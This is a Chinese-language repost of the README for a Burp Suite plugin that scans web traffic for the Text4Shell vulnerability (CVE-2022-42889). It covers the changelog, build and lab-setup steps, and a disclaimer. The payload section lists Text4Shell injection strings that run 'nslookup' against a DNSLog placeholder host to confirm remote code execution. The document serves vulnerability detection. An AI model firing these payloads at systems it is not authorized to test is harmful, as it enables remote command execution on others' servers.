項(xiàng)目地址:https://github.com/A0WaQ4/BurpText4ShellScan
簡(jiǎn)介使用java編寫的Text4shell burp被動(dòng)掃描插件
java maven項(xiàng)目,可以使用mvn package進(jìn)行編譯
更新
1.0 - 首次上傳,對(duì)所有經(jīng)過(guò)burp的包進(jìn)行被動(dòng)掃描,掃描對(duì)象包括了json、xml、fileupload
1.1 - 修復(fù)了body為空時(shí)導(dǎo)致的檢測(cè)錯(cuò)誤,修復(fù)了對(duì)URL參數(shù)不檢測(cè)的錯(cuò)誤
1.2 - 修復(fù)了body僅有json與xml時(shí)出現(xiàn)的參數(shù)構(gòu)造錯(cuò)誤,修復(fù)了dns二次檢測(cè)時(shí)未獲取key導(dǎo)致的錯(cuò)誤
1.3 - 添加了主動(dòng)掃描功能
1.4 - 添加了header黑名單功能,可以在resources/config.yml中修改
payload
- "%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27nslookup+dns-url%27%29%7D"
- "${scriptjava.lang.Runtime.getRuntime().exec('nslookup dns-url')}"
可以在resources/config.yml修改
使用
1. 搭建環(huán)境
使用github中的https://github.com/karthikuj/cve-2022-42889-text4shell-docker搭建環(huán)境
2.插件
代理訪問(wèn)http://yourip:80/text4shell/attack?search=aaa,開(kāi)始掃描
在logger中可看見(jiàn)插件發(fā)送的包
僅對(duì)是否可以dnslog進(jìn)行掃描,若dnslog接受到請(qǐng)求,則爆出漏洞
3. 配置
在resources/config.yml中的dnsLogModule修改dnslog配置,使用時(shí)可以修改為自搭建的DnsLog服務(wù)器
免責(zé)聲明
該工具僅用于安全自查檢測(cè),由于傳播、利用此工具所提供的信息而造成的任何直接或者間接的后果及損失,均由使用者本人負(fù)責(zé),作者不為此承擔(dān)任何責(zé)任。
-
服務(wù)器
+關(guān)注
關(guān)注
12文章
8701瀏覽量
84568 -
JAVA
+關(guān)注
關(guān)注
19文章
2943瀏覽量
104110 -
GitHub
+關(guān)注
關(guān)注
3文章
461瀏覽量
16237
原文標(biāo)題:Text4Shell的burp被動(dòng)掃描插件
文章出處:【微信號(hào):菜鳥(niǎo)學(xué)信安,微信公眾號(hào):菜鳥(niǎo)學(xué)信安】歡迎添加關(guān)注!文章轉(zhuǎn)載請(qǐng)注明出處。
發(fā)布評(píng)論請(qǐng)先 登錄
相關(guān)推薦
評(píng)論